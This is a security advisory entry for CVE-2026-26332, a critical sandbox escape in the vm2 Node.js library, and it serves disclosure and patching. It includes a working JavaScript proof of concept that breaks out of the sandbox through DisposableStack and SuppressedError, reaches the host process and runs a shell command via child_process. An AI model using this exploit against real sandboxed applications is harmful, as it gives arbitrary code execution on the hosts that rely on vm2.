CVE-2026-26332
CRITICAL9.8EPSS 0.08%VM2 Has a Sandbox Escape Issue via SuppressedError
Published: 5/5/2026Modified: 5/5/2026
Description
In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code. ### PoC ```js const { VM } = require("vm2"); const vm = new VM(); vm.run(` const ds = new DisposableStack(); ds.defer(() => { throw null; }); ds.defer(() => { const e = Error(); e.name = Symbol(); e.stack; }); try { ds.dispose(); } catch(e) { const Function = e.suppressed.constructor.constructor; const process = new Function("return process;")(); const { execSync } = process.mainModule.require("node:child_process"); execSync("echo pwned", { stdio: "inherit" }); } `); ```
Affected packages (1)
- npm/vm2from 0, < 3.11.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
References (9)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-26332
- PATCHhttps://github.com/patriksimek/vm2
- WEBhttps://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0
- WEBhttps://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
- WEBhttps://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca
- WEBhttps://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d
- WEBhttps://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
- WEBhttps://github.com/patriksimek/vm2/releases/tag/v3.11.0
- WEBhttps://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95